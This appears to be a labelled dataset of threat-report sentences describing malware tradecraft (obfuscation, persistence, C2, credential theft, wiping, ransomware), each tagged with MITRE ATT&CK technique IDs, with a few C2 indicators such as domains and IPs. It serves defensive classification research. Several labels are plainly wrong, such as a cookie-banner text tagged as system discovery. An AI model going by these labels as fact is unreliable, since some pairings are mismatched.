14937 lines
2.9 MiB
{"text1":"The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value","labels":"['T1057']"}
{"text1":"Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts","labels":"['T1569.002']"}
{"text1":"These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document","labels":"['T1584.004']"}
{"text1":"Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants","labels":"['T1056.001', 'T1113']"}
{"text1":"When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"5.0\" and \"(Windows","labels":"['T1071.001']"}
{"text1":"In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64","labels":"['T1027']"}
{"text1":"We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS","labels":"['T1218.005', 'T1059.005']"}
{"text1":"dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product - DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin - DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory - data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture - config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address","labels":"['T1027', 'T1082']"}
{"text1":"The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida","labels":"['T1027.002']"}
{"text1":"The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset","labels":"['T1027.003']"}
{"text1":"It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account","labels":"['T1583.006']"}
{"text1":"These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox","labels":"['T1082']"}
{"text1":"While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware","labels":"['T1027.002']"}
{"text1":"But first: How did they get the tools on the victim\u2019s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools","labels":"['T1570']"}
{"text1":"This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro\u2019s malicious extension. This extension will load on every browser startup using this specific .lnk file","labels":"['T1547.001', 'T1036.005']"}
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites","labels":"['T1005']"}
{"text1":"dbghelp.dll is incompatible with DEP (Data Exception Prevention), as shown in Figure 14. Thus, when it loads the operating system will disable DEP for the injected wmplayer.exe process. This means that code can be executed from memory regions that are not marked as executable in the context of this process","labels":"['T1562.001']"}
{"text1":"For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory. It also only wipes files that have specific file extensions","labels":"['T1083']"}
{"text1":"It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory","labels":"['T1055.001', 'T1055.001', 'T1027']"}
{"text1":"Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right","labels":"['T1552.002']"}
{"text1":"While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload\u2019s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name","labels":"['T1106']"}
{"text1":"After Tor is up and running, Siloscape uses it to connect to its C2 \u2013 an IRC server, using an onion address that was provided as a command line argument","labels":"['T1071']"}
{"text1":"One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system","labels":"['T1585']"}
{"text1":"It should be noted that the Win32\/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions","labels":"['T1485']"}
{"text1":"The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload","labels":"['T1027']"}
{"text1":"Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction","labels":"['T1135']"}
{"text1":"When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation","labels":"['T1047', 'T1218.005', 'T1559.001', 'T1027']"}
{"text1":"The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim\u2019s network were generally formatted like <domain>\\<username>. And attempted logins came from a relative small set of IP-addresses","labels":"['T1016', 'T1133']"}
{"text1":"CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5","labels":"['T1083']"}
{"text1":"The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we\u2019ll refer to the various malware pieces as components","labels":"['T1105']"}
{"text1":"But Ryuk isn\u2019t new to us\u2026 we\u2019ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)\u2014especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including \u201cWIZARD SPIDER,\u201d \u201cUNC1878,\u201d and \u201cTeam9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others","labels":"['T1047', 'T1018']"}
{"text1":"The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server","labels":"['T1082']"}
{"text1":"Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM\u2019s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised \u2013 and Microsoft has provided that indicator context where it is available to us","labels":"['T1584.001']"}
{"text1":"The malware proceeds to blacklist certain processes such as \u201cwininit.exe\u201d when approaches memory scraping in order to speed necessary card scan logic","labels":"['T1057']"}
{"text1":"We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others","labels":"['T1083']"}
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers","labels":"['T1189']"}
{"text1":"Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems","labels":"['T1490']"}
{"text1":"SUPERNOVA is implemented as a modification to the existing \u2018app_web_logoimagehandler.ashx.b6031896.dll\u2019 module of the SolarWinds Orion application. The purpose of this module, in it\u2019s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable","labels":"['T1036.005']"}
{"text1":"AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles","labels":"['T1555']"}
{"text1":"TA551 has distributed different families of malware, including Ursnif (Gozi\/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed","labels":"['T1204.002']"}
{"text1":"The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more","labels":"['T1217']"}
{"text1":"During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload","labels":"['T1574.002']"}
{"text1":"When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags","labels":"['T1140', 'T1573.001']"}
{"text1":"Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright","labels":"['T1059.007']"}
{"text1":"After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX\u2019s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed","labels":"['T1027']"}
{"text1":"IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword \u201cInternet Widgits Pty Ltd\u201d is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins","labels":"['T1573.002', 'T1185']"}
{"text1":"In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim","labels":"['T1566.002']"}
{"text1":"PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry","labels":"['T1552.002']"}
{"text1":"MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop\/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument","labels":"['T1489', 'T1562.001']"}
{"text1":"Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies","labels":"['T1005']"}
{"text1":"First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target. It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe. Stage1.exe purports to be ransomware, as it overwrites the target\u2019s master boot record with 512 bytes and upon reboot displays the following ransom note","labels":"['T1561.002']"}
{"text1":"The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings","labels":"['T1105']"}
{"text1":"These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information","labels":"['T1082']"}
{"text1":"Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools","labels":"['T1027']"}
{"text1":"An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network","labels":"['T1071.001', 'T1021.001', 'T1204.002', 'T1041']"}
{"text1":"Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations\u2019 known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL\/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message","labels":"['T1203']"}
{"text1":"As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named \u201cAdd.dll\u201d. Like the previously packed exploit, CVE-2019-0803 also has an export function named \u201cAddByGod\u201d and contains debug information","labels":"['T1027.002']"}
{"text1":"Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past\u00a0few weeks","labels":"['T1566.002']"}
{"text1":"This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001","labels":"['T1021.005']"}
{"text1":"We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL\/Pterodo, Win32\/Pterodo or Win64\/Pterodo by ESET\u2019s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks\u2019 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C\/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module","labels":"['T1547.001']"}
{"text1":"b.wnry \u2014 Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry \u2014 Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry \u2014 Ransom demand text - s.wnry \u2014 ZIP archive containing Tor software to be installed on the victim\u2019s system; saved in TaskData directory - t.wnry \u2014 Encrypted DLL containing file-encryption functionality - u.wnry \u2014 Main module of the WCry ransomware \u201cdecryptor\u201d - taskdl.exe \u2014 WNCRYT temporary file cleanup program - taskse.exe \u2014 Program that displays decryptor window to RDP sessions - msg \u2014 Directory containing Rich Text Format (RTF) ransom demands in multiple languages","labels":"['T1090.003']"}
{"text1":"CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment","labels":"['T1090', 'T1021.004', 'T1572']"}
{"text1":"In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor","labels":"['T1204.002']"}
{"text1":"After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as \u201c.CIIp\u201d, \u201c.Cllp\u201d and \u201c.C_L_O_P\u201d. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: \u201cClopReadMe.txt\u201d, \u201cREADME_README.txt\u201d, \u201cCl0pReadMe.txt\u201c and \u201cREAD_ME_!!!.TXT","labels":"['T1486']"}
{"text1":"H1N1 has self-propagation\/lateral movement functionality (which requires user interaction) via mapped\/available network shares or mounted USB devices","labels":"['T1080']"}
{"text1":"Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients","labels":"['T1114.001']"}
{"text1":"Before the driver is loaded, the malware disables crash dump by setting the following registry key","labels":"['T1070', 'T1562.006', 'T1112']"}
{"text1":"Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector","labels":"['T1204.002']"}
|
|
{"text1":"Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: - MAC address of the endpoint - Computer Name - Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName - This information is concatenated into a single string in the format: \u201cMAC_Address||ComputerName||ProductName\u201d and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant\u2019s install directory with the current system timestamp","labels":"['T1012']"}
|
|
{"text1":"Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount","labels":"['T1078.002', 'T1550.001']"}
|
|
{"text1":"In the analyzed sample the RAT component was named \u201cBotDLL[.]dll\u201d. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access","labels":"['T1125', 'T1090', 'T1005']"}
|
|
{"text1":"This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems","labels":"['T1113']"}
|
|
{"text1":"Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not","labels":"['T1082']"}
|
|
{"text1":"Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself","labels":"['T1204.002']"}
|
|
{"text1":"The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators","labels":"['T1071.001', 'T1071.002']"}
|
|
{"text1":"The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003","labels":"['T1496']"}
|
|
{"text1":"TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers","labels":"['T1610', 'T1071.001']"}
|
|
{"text1":"Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function","labels":"['T1106', 'T1027']"}
|
|
{"text1":"The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence","labels":"['T1059.003', 'T1547.001']"}
|
|
{"text1":"In this version, the communication protocol with the C&C server was also upgraded to use AES encryption","labels":"['T1573.001']"}
|
|
{"text1":"The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be \u201cnylalobghyhirgh.com","labels":"['T1568.002']"}
|
|
{"text1":"HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059.003']"}
|
|
{"text1":"The attackers then attempt to gain root access to the server by setting up a local privileged user named \u2018hilde\u2019 on the host server and use it in order to connect back via SSH","labels":"['T1021.004']"}
|
|
{"text1":"The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec\u2019s Threat Hunter Team, a part of\u00a0Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country","labels":"['T1057', 'T1204.002']"}
|
|
{"text1":"After the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user\u2019s files, by invoking a function named carve_target. It then generates a list of files to encrypt, by invoking the get_targets function, passing in the is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. The encrypted list of extensions is hard-coded at address 000000010001299E within the malware. In part one of this blog post series, we decrypted all the embedded strings, and thus can readily examine the decrypted list","labels":"['T1486']"}
|
|
{"text1":"Timeline . OSX\/FruitFly: 1) 2) Remove the malicious launch agent plist file ~\/Library\/LaunchAgents\/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy whose address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p command-line flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started every time the infected system is rebooted. MacRansom is the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save for perhaps a brute-force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the \/Library\/LaunchAgents\/com.osxext.cpucooler.plist file","labels":"['T1140']"}
|
|
{"text1":"Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon","labels":"['T1012']"}
|
|
{"text1":"This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros","labels":"['T1566.001']"}
|
|
{"text1":"The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object \u201cxl\\embeddings\\oleObject1[.]bin\u201d inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the \u201cReadAndWriteExtractedBinFile\u201d function - The DLL is loaded with LoadLibraryA - The DLL\u2019s exported function, such as \u201cGet2\u201d, is run by the macro","labels":"['T1055.001']"}
|
|
{"text1":"Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader","labels":"['T1027']"}
|
|
{"text1":"This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike\u2019s web server, and presents a one-liner to download and run the artifact","labels":"['T1197']"}
|
|
{"text1":"The\u00a0NetWire\u00a0payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were\u00a0the same","labels":"['T1105']"}
|
|
{"text1":"Upon exploitation, a GH0ST RAT variant is delivered to the victims\u2019 system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code","labels":"['T1070.001', 'T1059']"}
|
|
{"text1":"If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has a very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us track documents from the same author, as shown in Figure 6","labels":"['T1566.001', 'T1059.005']"}
|
|
{"text1":"Each Casbaneiro sample using this method has the buyer\u2019s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer\u2019s ID and downloads and executes the payload","labels":"['T1547.001', 'T1036.005', 'T1105']"}
|
|
